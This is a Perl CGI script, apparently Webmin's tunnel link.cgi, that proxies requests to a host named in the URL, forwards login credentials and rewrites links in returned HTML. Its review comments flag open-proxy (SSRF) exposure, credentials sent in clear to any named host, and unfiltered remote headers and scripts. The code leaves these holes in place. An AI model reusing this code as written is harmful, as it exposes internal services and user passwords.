#!/usr/bin/perl
# link.cgi
# Forward the URL from path_info on to another webmin server

use strict;
use warnings;
no warnings 'redefine';
no warnings 'uninitialized';
our (%config, %text, %module_info, %in, %gconfig, $module_name);
require './tunnel-lib.pl';

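# Parse the tunnel target out of PATH_INFO, which must look like
#   /<http|https>://<host>[:<port>][<path>]
# and derive the pieces used by the rest of the script.
#
# PATH_INFO is request-controlled, so raw control characters (CR, LF, NUL ..)
# are rejected up front: $host is later written into a "Host:" header line
# and $path into the request, and neither is re-validated before use.
# This relies on &error not returning to the caller.
#
# NOTE(review): nothing here restricts $host or $port, so the server will
# open a connection to whatever target the URL names. Setting $config{'url'}
# only replaces $openurl below; $host, $port and $path still come from
# PATH_INFO. Consider checking the target against the configured URL.
$ENV{'PATH_INFO'} =~ /[\x00-\x1f\x7f]/ &&
	&error("Bad PATH_INFO : ".&html_escape($ENV{'PATH_INFO'}));
$ENV{'PATH_INFO'} =~ /^\/(http|https):\/+([^:\/]+)(:(\d+))?(.*)$/ ||
	&error("Bad PATH_INFO : ".&html_escape($ENV{'PATH_INFO'}));

# Copy the captures straight away so later pattern matches cannot clobber them
my ($protocol, $host, $portsuffix, $portnum, $rest) = ($1, $2, $3, $4, $5);
my $ssl = $protocol eq "https";
my $port = $portnum || ( !$ssl ? 80 : 443 );	# default port follows scheme
my $path = $rest || "/";
my $openurl = "$protocol://$host$portsuffix$rest";	# full target URL
my $baseurl = "$protocol://$host$portsuffix";		# scheme://host[:port]

# Carry the query over to the remote request: QUERY_STRING when present,
# otherwise any command-line style arguments joined with '+'
if ($ENV{'QUERY_STRING'}) {
	$path .= '?'.$ENV{'QUERY_STRING'};
	}
elsif (@ARGV) {
	$path .= '?'.join('+', @ARGV);
	}

# URL prefixes used when rewriting links so they stay inside the tunnel
my $linkurl = &get_webprefix()."/$module_name/link.cgi/";
my $url = &get_webprefix()."/$module_name/link.cgi/$openurl";
$| = 1;		# unbuffered output
my $meth = $ENV{'REQUEST_METHOD'};
if ($config{'url'}) {
	$openurl = &fix_end_url($config{'url'}) || &error($text{'seturl_eurl'});
	}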

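# Work out which credentials (if any) to present to the remote server.
#   loginmode 2 : per-user login taken from the "tunnel" cookie
#   loginmode 1 : fixed login from the module configuration
#   otherwise   : no credentials
#
# NOTE(review): the cookie value is only base64-encoded "user:pass", so
# anyone able to read the cookie recovers the password. The cookie is
# presumably set by login.cgi - confirm its flags (Secure/HttpOnly) there.
my ($user, $pass);
if ($config{'loginmode'} == 2) {
	# Login is variable .. check if we have it yet
	if ($ENV{'HTTP_COOKIE'} =~ /tunnel=([^\s;]+)/) {
		# Yes - set the login and password to use. The limit of 2
		# keeps passwords that themselves contain ':' intact.
		($user, $pass) = split(/:/, &decode_base64("$1"), 2);
		}
	else {
		# No - need to display a login form
		&ui_print_header(undef, $text{'login_title'}, "");

		print "<center>\n";
		# $openurl can come from PATH_INFO, so escape it before
		# placing it in the page
		print &text('login_desc',
			    "<tt>".&html_escape($openurl)."</tt>"),"<p>\n";

		print &ui_form_start("/$module_name/login.cgi", "post");
		print &ui_hidden("url", $openurl);
		print &ui_table_start($text{'login_header'}, undef, 2);
		print &ui_table_row($text{'login_user'},
			&ui_textbox("user", undef, 20));
		print &ui_table_row($text{'login_pass'},
			&ui_password("pass", undef, 20));
		print &ui_table_end();
		print &ui_form_end([ [ undef, $text{'login_login'} ] ]);

		print "</center>\n";

		&ui_print_footer("", $text{'index_return'});
		exit;
		}
	}
elsif ($config{'loginmode'} == 1) {
	# Login is fixed
	$user = $config{'user'};
	$pass = $config{'pass'};
	}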

# Open the outbound connection; a non-reference return value is an error
# message, which is reported to the user.
# NOTE(review): whether TLS certificates are verified when $ssl is set
# depends on make_http_connection, which is not visible here - confirm.
my $con = &make_http_connection($host, $port, $ssl, $meth, $path);
if (!ref($con)) {
	&error($con);
	}

# Assemble the request header lines in the order they go on the wire
my @reqheaders = ( "Host: $host\r\n", "User-Agent: Webmin\r\n" );
if ($user) {
	# NOTE(review): the login is attached for whatever $host the request
	# URL named, and basic auth is only base64, so it travels in clear
	# text when $ssl is off. Consider limiting it to the configured host.
	(my $b64 = &encode_base64("$user:$pass")) =~ s/\n//g;
	push(@reqheaders, "Authorization: basic $b64\r\n");
	}
# Tell the remote side which Webmin server the request came through
push(@reqheaders, sprintf(
		"Webmin-servers: %s://%s:%d/$module_name/\r\n",
		$ENV{'HTTPS'} eq "ON" ? "https" : "http",
		$ENV{'SERVER_NAME'}, $ENV{'SERVER_PORT'}));
my $cl = $ENV{'CONTENT_LENGTH'};
if ($cl) {
	push(@reqheaders, "Content-Length: $cl\r\n");
	}
if ($ENV{'CONTENT_TYPE'}) {
	push(@reqheaders, "Content-Type: $ENV{'CONTENT_TYPE'}\r\n");
	}
push(@reqheaders, "\r\n");	# blank line ends the header section
foreach my $hline (@reqheaders) {
	&write_http_connection($con, $hline);
	}

# Relay the request body, if the client sent one
if ($cl) {
	my $body;
	&read_fully(\*STDIN, \$body, $cl);
	&write_http_connection($con, $body);
	}

# Read the response: the first line (status line) is consumed and not used,
# then header lines are collected until the first empty line.
#   %header  - last value seen for each lower-cased header name
#   $headers - every header line as received, newline-terminated
my $dummy = &read_http_connection($con);
my ($headers, %header);
for (;;) {
	my $headline = &read_http_connection($con);
	$headline =~ s/\r|\n//g;	# strip line terminators
	last unless $headline;		# blank line or EOF ends the headers
	$headline =~ /^(\S+):\s+(.*)$/ or &error("Bad header");
	my ($hname, $hvalue) = ($1, $2);
	$header{lc($hname)} = $hvalue;
	$headers .= "$headline\n";
	}

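# Decide what to do with the response headers: follow a redirect through the
# tunnel, report a failed login, or pass the headers on to the browser.
#
# The original second test on $header{'location'} (matching $host/$port/$path)
# could never run, because any true Location value had already redirected and
# exited; it has been dropped along with the $defport it needed.
if ($header{'location'}) {
	# fix a redirect so the browser stays inside the tunnel.
	# NOTE(review): the remote server picks the next tunnelled target
	# here; no check is applied to the host it names.
	my $loc = $header{'location'};
	if ($loc =~ /^\/\//) {
		# protocol-relative: reuse the current scheme
		$loc = "$protocol:$loc";
		}
	elsif ($loc =~ /^\//) {
		# host-relative: previously produced link.cgi//path, which
		# the PATH_INFO check rejects
		$loc = $baseurl.$loc;
		}
	# path-relative values (no leading slash) are still passed unchanged
	&redirect("/$module_name/link.cgi/$loc");
	exit;
	}
elsif ($header{'www-authenticate'}) {
	# Invalid login. $openurl, $path and $host can come from PATH_INFO
	# and &error is given HTML, so escape them before display.
	if ($config{'loginmode'} == 2) {
		# Clear the stored login so the form is shown again
		print "Set-Cookie: tunnel=; path=/\n";
		&error(&text('link_eautologin',
		     "<tt>".&html_escape($openurl)."</tt>",
		     &html_escape("/$module_name/link.cgi/$path")));
		}
	elsif ($user) {
		&error(&text('link_elogin', &html_escape($host),
			     &html_escape($user))." ".
		       &text('link_mconfig',
			"@{[&get_webprefix()]}/config.cgi?$module_name"));
		}
	else {
		&error(&text('link_enouser', &html_escape($host))." ".
		       &text('link_mconfig',
			"@{[&get_webprefix()]}/config.cgi?$module_name"));
		}
	}
else {
	# just output the headers.
	# NOTE(review): every remote header line is forwarded verbatim, so
	# headers such as Set-Cookie from the remote server reach the browser
	# as part of this script's response. Consider filtering them.
	print $headers,"\n";
	}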

# read back the rest of the page
#
# HTML responses (unless the remote side sent an X-No-Links header) are
# rewritten chunk by chunk so that src=, href= and action= URLs point back
# through link.cgi; everything else is copied to the browser unchanged.
# Each attribute is handled in three quoting forms: '...', "..." and bare.
# The substitutions run in sequence on the same chunk: protocol-relative and
# host-relative URLs are first made absolute, then absolute http/https URLs
# are prefixed with $linkurl.
#
# NOTE(review): only these three attributes are rewritten, and apart from
# that the remote markup (including any scripts) is printed as received in
# this script's own response. URLs elsewhere in the page are not redirected
# through the tunnel. Treat the remote server as trusted, or add filtering.
if ($header{'content-type'} =~ /text\/html/ && !$header{'x-no-links'}) {
	while($_ = &read_http_connection($con)) {
		# fix protocol relative src like <iframe src='//foo.com' />
		s/src='(\/\/[^']*)'/src='$protocol:$1'/gi;
		s/src="(\/\/[^"]*)"/src="$protocol:$1"/gi;
		s/src=(\/\/[^ "'>]*)/src=$protocol:$1/gi;

		# Fix protocol relative hrefs like <a href=//foo.com/foo.html>
		s/href='(\/\/[^']*)'/href='$protocol:$1'/gi;
		s/href="(\/\/[^"]*)"/href="$protocol:$1"/gi;
		s/href=(\/\/[^ "'>]*)/href=$protocol:$1/gi;

		# Fix protocol relative form actions like <form action=//foo.com>
		s/action='(\/\/[^']*)'/action='$protocol:$1'/gi;
		s/action="(\/\/[^"]*)"/action="$protocol:$1"/gi;
		s/action=(\/\/[^ "'>]*)/action=$protocol:$1/gi;

		# Fix absolute image links like <img src=/foo.gif>
		s/src='(\/[^']*)'/src='$baseurl$1'/gi;
		s/src="(\/[^"]*)"/src="$baseurl$1"/gi;
		s/src=(\/[^ "'>]*)/src=$baseurl$1/gi;

		# Fix offsite image links <img src=http://www.blah.com/foo.gif>
		s/src='((http|https):\/\/[^']*)'/src='$linkurl$1'/gi;
		s/src="((http|https):\/\/[^"]*)"/src="$linkurl$1"/gi;
		s/src=((http|https):\/\/[^ "'>]*)/src=$linkurl$1/gi;

		# Fix absolute hrefs like <a href=/foo.html>
		s/href='(\/[^']*)'/href='$baseurl$1'/gi;
		s/href="(\/[^"]*)"/href="$baseurl$1"/gi;
		s/href=(\/[^ "'>]*)/href=$baseurl$1/gi;

		# Fix offsite hrefs like <a href=http://www.blah.com/>
		s/href='((http|https):\/\/[^']*)'/href='$linkurl$1'/gi;
		s/href="((http|https):\/\/[^"]*)"/href="$linkurl$1"/gi;
		s/href=((http|https):\/\/[^ "'>]*)/href=$linkurl$1/gi;

		# Fix absolute form actions like <form action=/foo>
		s/action='(\/[^']*)'/action='$baseurl$1'/gi;
		s/action="(\/[^"]*)"/action="$baseurl$1"/gi;
		s/action=(\/[^ "'>]*)/action=$baseurl$1/gi;

		# Fix offsite form actions
		s/action='((http|https):\/\/[^']*)'/action='$linkurl$1'/gi;
		s/action="((http|https):\/\/[^"]*)"/action="$linkurl$1"/gi;
		s/action=((http|https):\/\/[^ "'>]*)/action=$linkurl$1/gi;

		# Disabled rewrites for script-driven navigation and return fields
		#s/\.location\s*=\s*'$path([^']*)'/.location='$url\/$1'/gi;
		#s/\.location\s*=\s*"$path([^']*)"/.location="$url\/$1"/gi;
		#s/window.open\("$path([^"]*)"/window.open\("$url\/$1"/gi;
		#s/name=return\s+value="$path([^"]*)"/name=return value="$url\/$1"/gi;
		print;
		}
	}
else {
	# Anything that is not HTML is relayed as-is; the second argument is
	# presumably a read size in bytes - confirm in read_http_connection
	while(my $buf = &read_http_connection($con,1024)) {
		print $buf;
		}
	}
&close_http_connection($con);

